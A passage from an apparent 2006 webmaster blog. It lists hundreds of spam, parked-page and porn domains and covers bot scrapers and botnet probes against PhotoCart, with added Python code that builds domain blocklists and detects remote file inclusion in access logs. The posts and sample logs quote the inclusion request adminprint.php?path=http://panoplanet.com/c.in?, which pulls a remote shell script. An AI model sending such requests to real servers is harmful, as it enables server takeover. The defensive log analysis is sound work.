97) blank-cdr-media.seblog.name
98) blog.freeyaho.com
99) blog.hotel-baikal.info
100) blog.porno-sample.com
101) blog.se.ppc-se.com
102) blog.umax-ppc.net
103) blog.umaxppc.net
104) blog.webmasterdiscuss.com
105) blue-dragon.board-online.com
106) blues.seblog.name
107) bmx-bicycle.seblog.name
108) board-online.com
109) boards-ppc-se.adsname.com
110) body-lotion.ads-affiliate-programs.com
111) boehm.seblog.name
112) booky.umaxppc.net
113) borrowing-money.seblog.name
114) british-columbia.ppc-se.com
115) bush-watch.seblog.name
116) business-administration-college.seblog.name
117) business-card-organizer.seblog.name
118) business.top-10-shop.com
119) but.freeyaho.com
120) but.seohuntress.com
121) buy-car.seblog.name
122) buy-diazepam.seblog.name
123) buy.freeyaho.com
124) buying-a-camera.seblog.name
125) cad-drafting.umaxsearch-se.com
126) calculator.seblog.name
127) canada-food-guide.seblog.name
128) canada.seblog.name
129) candy-stores.seblog.name
130) cannon-digital-camcorders.seblog.name
131) canon-g.seblog.name
132) cape-canaveral.board-online.com
133) car-buying-advice.seblog.name
134) carpenters.seblog.name
135) cash-advance-top.com
136) casio-watchband.seblog.name
137) casting.seblog.name
138) casual-clothes.top-new-affiliate-programs.com
139) casual.gamers.online-info.info
140) catalog.adsname.com
141) cd-interest-rate.seblog.name
142) cd-music.seblog.name
143) cd-replication.seblog.name
144) cello-lessons.internet-marketing-online.us
145) certificates.seblog.name
146) chapter.seblog.name
147) cheap-calls.seblog.name
148) cheap-computers.seblog.name
149) cheap.freeyaho.com
150) cheapest-gas.seblog.name
151) chemical-suppliers.seblog.name
152) chicago-bears-tickets.seblog.name
153) chicago.seblog.name
154) chicago.webmasterdiscuss.com
155) child.pornography.images.porno-sample.com
156) chimes.seblog.name
157) chocolate-fondue.seblog.name
158) christmas-crackers.seblog.name
159) christmas-decorations.seblog.name
160) chronometer.seblog.name
161) cinema.seblog.name
162) club.seblog.name
163) cme-courses.board-online.com
164) cobb-county-school.seblog.name
165) cocoa.dimattic.com
166) colloidal.seblog.name
167) columbia.seblog.name
168) commodity-charts.seblog.name
169) community.freeyaho.com
170) computer-cart.seblog.name
171) computers.seblog.name
172) conga.seblog.name
173) contractors.seblog.name
174) converting.seblog.name
175) cosmetic-contacts.webmaster-online.net
176) court-tv-message-boards.seblog.name
177) craft.seblog.name
178) credit-repair.seblog.name
179) critical.board-online.com
180) cruisers.seblog.name
181) csi.seblog.name
182) cufflinks.seblog.name
183) custom-mailbox.seblog.name
184) data-entry.seblog.name
185) data.seblog.name
186) day-camp.seblog.name
187) debt-to-income-ratio.seblog.name
188) decorative-bird-house.seblog.name
189) delaware.freeyaho.com
190) deltagard.top-10-shop.com
191) description.sehuntress.biz
192) desk.seblog.name
193) dessert.seblog.name
194) digital-world-insider.board-online.com
195) dildos.seblog.name
196) dimattic.com
197) dining-set.seblog.name
198) diploma.seblog.name
199) discount-cigarettes.umax-search.biz
200) discount-golf-clubs.seblog.name
201) discovers.computer-screen.ppc-se.info
202) disneyland-ticket.seblog.name
203) distributor-network.seblog.name
204) domain.freeyaho.com
205) domains-affiliate-programs.com
206) down-blouse-picture.seblog.us
207) drama.seblog.name
208) dremel-tool.seblog.name
209) drugs.seblog.name
210) dsdomain.com
211) dsl-available-area.webmaster-online.net
212) dsl-maryland.seblog.name
213) dvd-decoder.seblog.name
214) earth.systems.board-online.com
215) educators.top-10-shop.com
216) electronic-forms.seblog.name
217) electronic-passports.porno-sample.com
218) emergency.seblog.name
219) epson-pos-printer-ribbon.seblog.name
220) epson-products.seblog.name
221) esq-venture.seblog.name
222) eurail.seblog.name
223) eye-exercise.nude-teacher.com
224) faucets.seblog.name
225) ferret-cages.seblog.name
226) ferret.seblog.name
227) film-scanners.1day.us
228) fine-furniture.dsdomain.com
229) fioricet-online.seblog.name
230) firearms-law.seblog.name
231) first.freeyaho.com
232) fishing-industry.seblog.name
233) fitness-training.seblog.name
234) five.sehuntress.com
235) flags.umax-search-search-engine.com
236) flasks.seblog.name
237) flex.dimattic.com
238) flex.seblog.name
239) flexographic.seblog.name
240) florida-long-distance-providers.seblog.name
241) florist-uk.seblog.name
242) fluorescent-ballast.seblog.name
243) flute-lessons.seblog.name
244) foam.seblog.name
245) football.seblog.name
246) ford.seblog.name
247) form.adsname.com
248) form.freeyaho.com
249) form.news.umaxse.net
250) form.umaxppc.net
251) form.umaxse.net
252) form.umaxse.org
253) forum-online.biz
254) forum.adsname.com
255) france-flag.seblog.name
256) fraud.top-10-shop.com
257) free-hit.com
258) free-order.adsname.com
259) free.adsname.com
260) free.freeyaho.com
261) freebies.adsname.com
262) freebies.baikalsk.net
263) freebies.freeyaho.com
264) freebies.seohuntress.com
265) freebies.umaxppc.net
266) freestyle-bikes.seblog.name
267) freeyaho.com
268) french-chocolates.seblog.name
269) full-suspension-bike.seblog.name
270) futons.seblog.name
271) futures-broker.seblog.name
272) futures-charts.top-10-shop.com
273) g-string.seblog.name
274) gambling-rule.seblog.name
275) game-publisher.top-10-shop.com
276) gay-sex.baikalsk.com
277) general.yula.us
278) german-chocolate.seblog.name
279) glass-guard.seblog.name
280) global-positioning-system.ppc-se.com
281) google-ceo.board-online.com
282) google.adsense.ppc-se.com
283) google.top-10-shop.com
284) googlepray.adsname.com
285) gospel.hockey.seblog.us
286) graber.seblog.name
287) grip.seblog.name
288) guess.seblog.name
289) guestbook.adsname.com
290) guestbook.freeyaho.com
291) guestbook.umaxse.info
292) guestbook.umaxse.net
293) guylian.seblog.name
294) hair-style-photo.seblog.name
295) hairs.seblog.name
296) hardcore-fucking.seblog.name
297) health.top-10-shop.com
298) healthcare.seblog.name
299) healthy-appetizers.seblog.name
300) helmet-sale.dsdomain.com
301) helmet.seblog.name
302) herbal-breast-enhancement.seblog.name
303) hi-fi-audio.seblog.name
304) history-of-chocolate-cake.seblog.name
305) hockey-statistics.seblog.name
306) hockey.seblog.us
307) home-building-plans.seblog.name
308) home-decoration.seblog.name
309) home-repair-help.seblog.name
310) home.adsname.com
311) homedrugtest.seblog.name
312) horoscopes.seblog.name
313) hot-jobs-online.com
314) hotel-baikal.com
315) hotel-baikal.info
316) hotel-shop.info
317) hotel.freeyaho.com
318) house-plants.seblog.name
319) houseware.seblog.name
320) how-to-lose-weight.seblog.name
321) hp-ink.dimattic.com
322) hp.seblog.name
323) humidor.seblog.name
324) hybrids.seblog.name
325) i-love-lucy.dimattic.com
326) i-love-you-gifts.umax-search-search-engine.com
327) iguana-cages.seblog.name
328) imported-candy.umax-search.biz
329) impotent.seblog.name
330) inc.seblog.name
331) incorporate-in-new-jersey.seblog.name
332) independent-book-publishers.seblog.name
333) independent-contractor.seblog.name
334) individual-investor-magazine.seblog.name
335) industrial-adhesives.seblog.name
336) industrial-valves.seblog.name
337) info.seblog.name
338) information-broker.seblog.name
339) insect-repellants.porno-sample.com
340) intel.seblog.name
341) internet-marketing-online.us
342) internet-marketing.adsname.com
343) internet.baikal-info.com
344) internet.freeyaho.com
345) interracial.seblog.name
346) investing.seblog.name
347) islander-on-the-beach.seblog.name
348) jaguar-xj.seblog.name
349) jensen-headphones.seblog.name
350) job-opening.seblog.name
351) john-hopkins-medical-center.seblog.name
352) jumpsuits.seblog.name
353) jvc-camcorder-vhsc.seblog.name
354) keynote.seblog.name
355) keyword.qoclick.net
356) keywords-blog.com
357) keywords.freeyaho.com
358) kids-game.seblog.name
359) kilts.seblog.name
360) kiss.seblog.name
361) kodak.seblog.name
362) lake-baikal.info
363) lamp-and-shade.seblog.name
364) las-cruces-sun-news.seblog.name
365) last.top-10-shop.com
366) latest.freeyaho.com
367) latest.ppc-se.com
368) latina.seblog.name
369) learning-computer.umax-search-search-engine.com
370) lease.seblog.name
371) leather-brief-case.seblog.name
372) leather-briefcase.seblog.name
373) lesson.top-10-shop.com
374) lexmark--driver.seblog.name
375) lexmark.specific911.org
376) library-project.tricks.name
377) light-bulb.seblog.name
378) lighting-design.seblog.name
379) lightwave.seblog.name
380) literature.yula.us
381) lithography.seblog.name
382) litter.seblog.name
383) local-telephone-service.seblog.name
384) logo.top-10-shop.com
385) lonestar.seblog.name
386) loop.seblog.name
387) low-intrest-credit-card.seblog.name
388) lowermybills.com.webmasterdiscuss.com
389) macanudo.seblog.name
390) magic.seblog.name
391) magnet.seblog.name
392) major-vulnerability.porno-sample.com
393) managed-futures.seblog.name
394) map-guide.freeyaho.com
395) maps.seblog.name
396) marketing-organization.seblog.name
397) martial-arts-information.seblog.name
398) maryland-local-phone-service.seblog.name
399) may.umax-search.info
400) mechanical-tubing.seblog.name
401) medical-advise.seblog.name
402) medical-references.seblog.name
403) medical-sites.seblog.name
404) medical-symbols.seblog.name
405) men-bracelet.seblog.name
406) mens-dress-watches.seblog.name
407) meta-tags.blog.ppc-se.com
408) mexico-newspaper.seblog.name
409) miami-tv.sampleclip.net
410) milk-chocolate.seblog.name
411) mlb.seblog.name
412) mobile-computing.board-online.com
413) modern-chairs.seblog.name
414) moonstruck-chocolatier.seblog.name
415) most.adsname.com
416) most.freeyaho.com
417) most.woodworking.real.the.2006.1day.name
418) mothers.seblog.us
419) movado.seblog.name
420) msn-search.blog.ppc-se.com
421) multifunction-printers.seblog.name
422) nada-used-car-guide.seblog.name
423) natural-pest-control.seblog.name
424) natural-skin-care.seblog.name
425) ncaa-sports.seblog.name
426) network-traffic-analysis.seblog.name
427) new-car.seblog.name
428) news-analysis.board-online.com
429) news.blog-se.ppc-se.info
430) news.top-10-shop.com
431) news.umaxse.net
432) news.woods-hole-researcher.ppc-se.info
433) nfl-football-picks.seblog.name
434) nfl-stats.seblog.name
435) nhl-picks.seblog.name
436) nintendo.co.ltd.board-online.com
437) nintendo.latest-console.board-online.com
438) nokia-phones.baikal-shop.com
439) noni.seblog.name
440) nude-teacher.com
441) numerous.umax-search.info
442) nursing-home-malpractice.seblog.name
443) nut-tree.seblog.name
444) october.window.tricks.name
445) odds-makers.seblog.name
446) odds.seblog.name
447) off-track-betting.seblog.name
448) ohio-attorney.seblog.name
449) online-info.info
450) online-jewelry.seblog.name
451) online-jukebox.seblog.name
452) online-pharmacy.seblog.name
453) online.freeyaho.com
454) online.online-info.info
455) or.adsname.com
456) or.freeyaho.com
457) or.online-info.info
458) oscar.seblog.name
459) osteo-arthritis.seblog.name
460) out-google.blog.ppc-se.com
461) overthrow-apple-computer.ppc-se.com
462) pa.online-info.info
463) packages.freeyaho.com
464) pads.seblog.name
465) pallet-jack.seblog.name
466) pallet.seblog.name
467) panasonic-product.seblog.name
468) paper-weights.seblog.name
469) parenting.seblog.name
470) pc-game.baikalsk.net
471) pecan-praline.seblog.name
472) penile-erection.seblog.name
473) pentax-zxm.seblog.name
474) personal-finances.seblog.name
475) pet-monkey.seblog.name
476) pet-tags.seblog.name
477) photo-exhibition.seblog.name
478) photographic-paper.seblog.name
479) php.yula.ws
480) pink.seblog.name
481) pittsburgh-newspaper.seblog.name
482) placemat.seblog.name
483) plants.seblog.name
484) playing-cards.seblog.name
485) playstation-3.board-online.com
486) playstation-3.top-10-shop.com
487) plea-bargain.seblog.name
488) plus.sehuntress.com
489) polar-fleece-jackets.seblog.name
490) polaroid-camera.seblog.name
491) polo.seblog.name
492) pop.seblog.name
493) popcorn-machine.seblog.name
494) popular.dimattic.com
495) popular.freeyaho.com
496) porn-teen-pic.com
497) porno-sample.com
498) portable-scooter.seblog.name
499) powerball-lottery.seblog.name
500) ppc-se-provides.top-new-affiliate-programs.com
501) ppc-se.biz
502) ppc-se.com
503) ppc-se.net
504) ppc-se.top.and.reef.adscom.us
505) ppc.adsname.com
506) ppc.freeyaho.com
507) premium-content.top-10-shop.com
508) prescription.seblog.name
509) price.baikal-shop.com
510) print-on-demand.seblog.name
511) print.seblog.name
512) printing-methods.seblog.name
513) producing.porno-sample.com
514) program-directory.adsname.com
515) publications.seblog.name
516) publishing-mergers.seblog.name
517) qoclick-se.adsname.com
518) qoclick.net
519) questions.freeyaho.com
520) questions.specific911.info
521) questions.umax.org
522) questions.umaxppc.net
523) questions.we.freeyaho.com
524) questions.yula.us
525) quick-money.seblog.name
526) rack-case.seblog.name
527) rack.seblog.name
528) radio-blog-club.seblog.name
529) radio-station.seblog.name
530) raliegh-bicycles.seblog.name
531) ralph-lauren-eyewear.seblog.name
532) rates.the.2006.1day.name
533) ray-ban.seblog.name
534) reber.seblog.name
535) register.freeyaho.com
536) replacement-china.seblog.name
537) reseller-porn.com
538) robert.m.carey.porno-sample.com
539) roller-conveyors.seblog.name
540) rose.work-at-home-online.info
541) saab-part.seblog.name
542) safety-glasses.seblog.name
543) same.freeyaho.com
544) sampleclip.net
545) samsung-camcorder.seblog.name
546) samsung.seblog.name
547) santana.seblog.name
548) sapphire-earrings.seblog.name
549) scale.seblog.name
550) scanner.seblog.name
551) school.seblog.name
552) school.top-10-shop.com
553) sconce.seblog.name
554) script.php.baikal-guide.com
555) se-blog.ppc-se.com
556) se.blog.ppc-se.com
557) seblog.name
558) security-vulnerability.specific911.info
559) sehuntress.com
560) sehuntress.info
561) sehuntress.net
562) self-help-videos.seblog.name
563) seohuntress.com
564) sfi.seblog.name
565) shipping-information.seblog.name
566) shopping-services.seblog.name
567) shopping.baikal-shop.com
568) showavailable.com
569) side.specific911.info
570) siemens.seblog.name
571) simple-gifts.seblog.name
572) single-latin-woman.seblog.name
573) site-diagnostics.adsname.com
574) site.adsname.com
575) slager-radio.seblog.name
576) smith.seblog.name
577) so.adsname.com
578) soccer.seblog.name
579) software-giant.blog.ppc-se.com
580) software-products.board-online.com
581) solar-observatories.board-online.com
582) solar.terrestrial.relations.observatory.board-online.com
583) sony-digital-tv.seblog.name
584) sony-dvd-players.sampleclip.net
585) sony-mavica.seblog.name
586) soul.seblog.name
587) spa.seblog.name
588) spacecraft.board-online.com
589) specialty-envelopes.seblog.name
590) specialty-printers.seblog.name
591) specific.adsname.com
592) specific.dimattic.com
593) specific.freeyaho.com
594) specific.reseller-porn.com
595) specific.sampleclip.net
596) specific.top-10-shop.com
597) specific911.biz
598) specific911.info
599) specific911.org
600) specific911.umax-search.info
601) speed-up-internet.seblog.name
602) spells.seblog.name
603) spoon.seblog.name
604) spreadsheet-help.seblog.name
605) standard-bikes.seblog.name
606) star-printer.seblog.name
607) stemware.seblog.name
608) stickers.seblog.name
609) suggestions.adsname.com
610) suggestions.umax-search.info
611) suggestions.umax.org
612) suggestions.umaxse.org
613) suit.seblog.name
614) sunburn.seblog.name
615) sunglases.seblog.name
616) sweepstakes.seblog.name
617) tables.seblog.name
618) tanning-products.seblog.name
619) tax-filing.umax-se.biz
620) tax-rates.seblog.name
621) technologies.seblog.name
622) teen-sex.seblog.name
623) teens.seblog.name
624) telecommunication.seblog.name
625) tennessee.seblog.name
626) tent.top-10-shop.com
627) the-bad.blog.ppc-se.com
628) the-bottom.blog.ppc-se.com
629) the-good.blog.ppc-se.com
630) the.adsname.com
631) the.freeyaho.com
632) the.hotel-baikal.info
633) the.lake-baikal.info
634) the.online-info.info
635) the.porn-teen-pic.com
636) thesaurus.yula.us
637) tips.sehuntress.com
638) titanic.seblog.name
639) titanium.seblog.name
640) tokyo-game-show-2006.board-online.com
641) tommy-hilfiger.seblog.name
642) top-10-shop.com
643) toshiba-copiers.seblog.name
644) tour.seblog.name
645) towel.seblog.name
646) tracking.seblog.name
647) trade-show-display.seblog.name
648) traffic-information.seblog.name
649) training.seblog.name
650) transformers.seblog.name
651) travel-gear.sehuntress.net
652) truffles.seblog.name
653) tube.seblog.name
654) tv-videos.ppc-se.info
655) ultima.seblog.name
656) ultra-mobile.board-online.com
657) umax-ppc.net
658) umax-se.biz
659) umax-se.org
660) umax-search-ppc-se-board.com
661) umax-search-ppc.com
662) umax-search-search-engine.com
663) umax-search.biz
664) umax-search.info
665) umax.org
666) umaxppc.com
667) umaxppc.net
668) umaxppcsearch.com
669) umaxse.biz
670) umaxse.info
671) umaxse.net
672) umaxse.org
673) umaxsearch-ppc-se.com
674) umaxsearch-ppc.com
675) umaxsearch-se.com
676) unique-gift-ideas.seblog.name
677) university.freeyaho.com
678) unusual-clocks.seblog.name
679) usa.freeyaho.com
680) utilities.seblog.name
681) va.top-10-shop.com
682) valium-buy.1day.name
683) vermont-college.seblog.name
684) victorian.seblog.name
685) vintage-eyewear.seblog.name
686) virgin-sexy.com
687) virtual.freeyaho.com
688) virtual.ppc-se.net
689) virtual.seohuntress.com
690) virtual.specific911.info
691) virtual.umax.org
692) we.freeyaho.com
693) weather.sehuntress.com
694) web-design.seblog.name
695) web-statistic.seblog.name
696) web.gambling-laws.affiliate-books.com
697) webmasterdiscuss.com
698) weekly-pay-ppc-se.com
699) weekly-teens.com
700) western-new-england-college.seblog.name
701) white-boards.seblog.name
702) widely.gambling-laws.affiliate-books.com
703) windchimes.seblog.name
704) window.tricks.name
705) wine-of-the-month.seblog.name
706) winery.seblog.name
707) witch.seblog.name
708) wood-blinds.webmasterdiscuss.com
709) wooden-clocks.seblog.name
710) wooden-shelves.seblog.name
711) work-at-home-top.com
712) work-from-home-message-boards.seblog.name
713) work.top-10-shop.com
714) workforce-management.seblog.name
715) workstation.seblog.name
716) world.adsname.com
717) world.freeyaho.com
718) writing-marketing-plan.seblog.name
719) xbox-360.board-online.com
720) xerox-printer-cartridges.seblog.name
721) yahoo-message-boards.seblog.name
722) you.freeyaho.com
723) you.gambling-laws.affiliate-books.com
724) you.valium-buy.1day.name
725) your.freeyaho.com
726) your.umax-search.info
727) yula.name
728) yula.us
729) yula.ws
730) zune.board-online.com
Just pick a random domain name out of the list and see how much spam you can find in the search engines all related to this single domain. This group does it all from guestbook spam to membership profile spam, it's a one stop spam shop.

Note that the purpose of most of these domains is to redirect you to a free parked page on FREEYAHO which appears to be where they make their money.

What a twisted web of MFA, spam and domain parks they've woven.
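A reverse-IP list like the one above is most useful as blocklist input: reduce every hostname to the domain somebody had to register, then refuse any submitted link (guestbook, comment, profile) whose host falls under one of those domains. The Python below is an added example and not the blog's own tool or the reverse-IP service it used. It assumes a simplified rule for registrable domains (last two labels, or three under a handful of suffixes such as co.uk) in place of a full public-suffix list, and it handles the one odd entry the list contains, a bare IP literal, by skipping it. The sample hostnames are a small subset taken from the list above.

```python
import ipaddress
from urllib.parse import urlsplit

# Second-level suffixes under which the registrable name is one label deeper.
# A simplified stand-in for a full public-suffix list (assumption of this example).
TWO_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.au", "com.mx", "co.jp"}

# Constructed sample: a handful of hostnames taken from the reverse-IP list above,
# including the bare IP literal that list also contains.
SAMPLE_HOSTS = [
    "1.top-10-shop.com", "2006.freeyaho.com", "a.adsname.com", "blog.umax-ppc.net",
    "keyword.qoclick.net", "flags.umax-search-search-engine.com", "66.199.247.42",
    "freeyaho.com", "you.gambling-laws.affiliate-books.com",
]


def registrable_domain(host):
    """Reduce a hostname to the domain someone had to register; None for IP literals."""
    host = host.strip().rstrip(".").lower()
    if not host:
        return None
    try:
        ipaddress.ip_address(host)   # the list contains '66.199.247.42' itself
        return None
    except ValueError:
        pass
    labels = host.split(".")
    n = 3 if ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return ".".join(labels[-n:]) if len(labels) >= n else None


def build_blocklist(hosts):
    """Set of registrable domains behind a list of hostnames (duplicates collapse)."""
    return {d for d in (registrable_domain(h) for h in hosts) if d}


def is_blocked_url(url, blocklist):
    """True if the URL's host is a blocked domain or any subdomain of one.

    Matching is label-aligned, so 'notfreeyaho.com' is not caught by 'freeyaho.com'
    and 'freeyaho.com.example.org' is not caught either.
    """
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    if not host:
        return False
    labels = host.split(".")
    return any(".".join(labels[i:]) in blocklist for i in range(len(labels)))


def partition_links(urls, blocklist):
    """Split submitted links into (allowed, blocked) for a comment/guestbook filter."""
    allowed, blocked = [], []
    for u in urls:
        (blocked if is_blocked_url(u, blocklist) else allowed).append(u)
    return allowed, blocked


if __name__ == "__main__":
    bl = build_blocklist(SAMPLE_HOSTS)
    print(f"{len(bl)} registrable domains behind {len(SAMPLE_HOSTS)} hostnames")
    ok, bad = partition_links(
        ["http://www.freeyaho.com/park.html", "http://example.com/", "http://notfreeyaho.com/"],
        bl)
    print("allowed:", ok)
    print("blocked:", bad)
```

Seven registrable domains cover the nine sample hostnames, and the full 730-entry list collapses the same way: most of it is subdomains of seblog.name, freeyaho.com and a few umax-* names, which is exactly why blocking by registrable domain rather than by exact hostname is the right granularity for this kind of network.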

Wednesday, December 13, 2006

Escalating PhotoCart Vulnerability Attack

I thought this silly little phase had passed and these morons had given up since there were only a few attempts after my last post. Sadly, that wasn't the case and when I got up this morning and checked the site stats I found they mounted an even bigger attack than before.

This is all good, just keep coming at my site and exposing the size of your network, because you're just proving Forrest Gump's mother correct as "Stupid is as stupid does."

Here's the path they desperately want, which doesn't exist on my server:

GET /PhotoCart/adminprint.php?path=http://panoplanet.com/c.in?

[UPDATE: It appears panoplanet.com has been taken down within the last couple of hours so you can't see the script anymore. Here are some links to show they were attacking others for a variety of things.]

Note that this is the script they are attempting to inject, which, from a casual glance at the code, appears to give them shell access.
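The request quoted above is the classic shape of a remote file inclusion attempt: a query parameter (`path`) whose value is itself an absolute URL, in the hope that the targeted script passes it to an include and so fetches and runs the attacker's `c.in` on the server. Because this server has no PhotoCart, every attempt ends in a 404, but the same tell-tale is what you want to watch for on any site. The Python below is an added example (not the blog's or PhotoCart's code): it reads Apache "combined" access-log lines, flags any query parameter whose decoded value starts with a remote scheme, and tallies the hosts the payload would have been pulled from, which is the list the post reports to the hosts. The log lines are constructed; the first two reuse the exact path and query shown in the post (plain and URL-encoded), the other two are benign requests.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" access-log line.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A query-parameter value that is itself an absolute URL is the tell-tale of a
# remote file inclusion attempt: the attacker wants the server to fetch and
# execute that URL in place of a local file.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)

# Constructed sample log. The first request is the exact path/query quoted in
# the post; the second is the same request URL-encoded; the third is a benign
# page view; the fourth is a benign parameter that merely contains 'http'.
SAMPLE_LOG = """\
72.29.76.238 - - [13/Dec/2006:08:01:12 -0800] "GET /PhotoCart/adminprint.php?path=http://panoplanet.com/c.in? HTTP/1.0" 404 512 "-" "libwww-perl/5.805"
189.146.75.42 - - [13/Dec/2006:08:01:15 -0800] "GET /PhotoCart/adminprint.php?path=http%3A%2F%2Fpanoplanet.com%2Fc.in%3F HTTP/1.0" 404 512 "-" "libwww-perl/5.803"
10.0.0.5 - - [13/Dec/2006:08:02:00 -0800] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (constructed benign visitor)"
10.0.0.6 - - [13/Dec/2006:08:02:30 -0800] "GET /search.php?q=what+is+http HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (constructed benign visitor)"
"""


def remote_include_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = unquote(value).strip()   # second decode catches double-encoded payloads
        if REMOTE_URL_RE.match(value):
            hits.append((name, value))
    return hits


def analyze_log(text):
    """One record per RFI attempt: who sent it, which script and parameter,
    and which host the payload would have been fetched from."""
    attempts = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for name, value in remote_include_params(m["target"]):
            attempts.append({
                "ip": m["ip"],
                "ua": m["ua"],
                "script": urlsplit(m["target"]).path,
                "param": name,
                "payload_host": urlsplit(value).hostname,
                # 404 means the script does not exist on this server; a 200 on a
                # script that takes a path/include parameter needs a closer look.
                "status": int(m["status"]),
            })
    return attempts


def payload_hosts(attempts):
    """Count the hosts serving the injected script: the list a webmaster reports
    to the abuse desk, as the post does for panoplanet.com and wnydir.com."""
    return dict(Counter(a["payload_host"] for a in attempts))


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for a in found:
        print(f"{a['ip']} -> {a['script']} [{a['param']}] from {a['payload_host']} "
              f"status {a['status']} ua {a['ua']}")
    print("payload hosts:", payload_hosts(found))
```

On the sample it reports two attempts, both from libwww-perl clients, both against `/PhotoCart/adminprint.php` via `path`, both pointing at panoplanet.com, and both answered with 404; the benign lines produce nothing. The status code is worth keeping in the record: on a server that does run the targeted script, a 200 against the same request is the line to investigate first.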


Here's all the sites involved in today's attack:



Maybe it's time I send a few letters to the owners of these compromised servers and see what happens.

Thursday, December 07, 2006

Day Two of the Photo Cart Attack

It's very interesting to watch this Photo Cart vulnerability probe continue: some of the same IPs attacked yet again, but there were also some new locations joining in the assault.

The morons launching this assault just didn't seem to understand that my site doesn't run Photo Cart when they attacked me yesterday, and like a bunch of deaf, dumb and blind lemmings they did the same stupid thing again today.

Here's today's list of sites trying to attack:

I truly feel bad for any idiots running Photo Cart about now.

Wednesday, December 06, 2006

TopicBlogs Steps Over The Line

TopicBlogs hasn't even launched yet but they managed to piss me off stepping over the boundary.

The RSS feed is fair game, but pulling the linked pages without permission is NOT fair game.

Here's an example:

72.36.205.106 "GET /rss_feed.xml HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage2.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage3.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage4.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage5.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage6.html HTTP/1.0" "topicblogs/0.9"
72.36.205.106 "GET /blogpage7.html HTTP/1.0" "topicblogs/0.9"
Maybe you people over at TopicBlogs should implement robots.txt checking to see if we allow you to step off the RSS feed.

Until you fix it, you're just BLOCKED!

Botnet Attempts Photo Cart Vulnerability Attack

Today some mental midget wannabe hackers tried to hit my site from what appeared to be a bunch of compromised locations, looking for a Photo Cart vulnerability that they naively attempted to exploit over 1,000 times.

Can you say bot blocker you lame hacking idiots?

Check your log files for this little gem:

/PhotoCart/adminprint.php?path=
Check out this list of sites that launched the attack:
Some are obviously compromised sites.
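As an added example that is not part of the original post, here is a small Python log scan that pulls this probe out of an Apache combined-format access log and tallies it per source IP and user agent, the way the lists on this blog do. The log lines and hostnames in it are constructed, not real traffic.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format, the sort of line a webmaster would grep for the probe.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The path the bots are hammering (from the post). A path= value that points
# off-site is a remote-file-inclusion attempt against PhotoCart's adminprint.php.
PROBE_PATH = "/photocart/adminprint.php"

def is_photocart_probe(target):
    """True when the request targets adminprint.php with an off-site path= value."""
    parts = urlsplit(target)
    if parts.path.lower() != PROBE_PATH:
        return False
    values = parse_qs(parts.query, keep_blank_values=True).get("path", [])
    return any(v.lower().startswith(("http://", "https://", "ftp://")) for v in values)

def scan_log(lines):
    """Return {(ip, user_agent): count} for every probe found in the log lines."""
    hits = Counter()
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m and is_photocart_probe(m.group("target")):
            hits[(m.group("ip"), m.group("ua"))] += 1
    return hits

def report(hits):
    """Render the counts in the style the post uses: IP requested N pages as UA."""
    return [f'{ip} requested {n} pages as "{ua}"'
            for (ip, ua), n in sorted(hits.items(), key=lambda kv: -kv[1])]

# Constructed sample lines (not real traffic): two bots probing, one normal visitor.
SAMPLE_LOG = """\
198.51.100.7 - - [06/Dec/2006:08:12:01 -0500] "GET /PhotoCart/adminprint.php?path=http://example.invalid/c.in? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [06/Dec/2006:08:12:02 -0500] "GET /photocart/adminprint.php?path=http://example.invalid/c.in? HTTP/1.1" 404 512 "-" "libwww-perl/5.805"
203.0.113.9 - - [06/Dec/2006:08:13:10 -0500] "GET /PhotoCart/adminprint.php?path=ftp://example.invalid/c.in HTTP/1.0" 404 512 "-" "libwww-perl/5.65"
192.0.2.44 - - [06/Dec/2006:08:14:00 -0500] "GET /blogpage2.html HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.44 - - [06/Dec/2006:08:14:05 -0500] "GET /PhotoCart/adminprint.php?path=local.php HTTP/1.1" 404 512 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for line in report(scan_log(SAMPLE_LOG)):
        print(line)
```

The last sample line shows why the check looks at the path= value rather than the script name alone: a local value is a 404 on a site without PhotoCart, not an injection attempt.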

Oh boy, let the fun begin!

Friday, December 01, 2006

Webmaster Owns Spammers Ass

This is priceless: one of the phpBB spamming idiots from Russia messed with the wrong webmaster this time, who now owns his spamming ass.

You just have to read this DRC forum post to believe anyone could be so stupid.

Thanks to SpamHuntress for pointing this out.

Wednesday, November 29, 2006

Dear Amazon AWS Group

To whom it may concern,

Your bot crawled my site today as shown below. Please notify your engineers, and I use the term loosely, that "Java/1.5.0_09" is not a valid bot name. Since Amazon sells books on how to program Java, I'm sure you can find at least one book in your warehouse that will explain how to set the User Agent string when making web requests.

Additionally, would honoring ROBOTS.TXT be too much to request or do you feel justified not checking the robots file since your programmers can't figure out how to tell us what your bot name is in the first place?

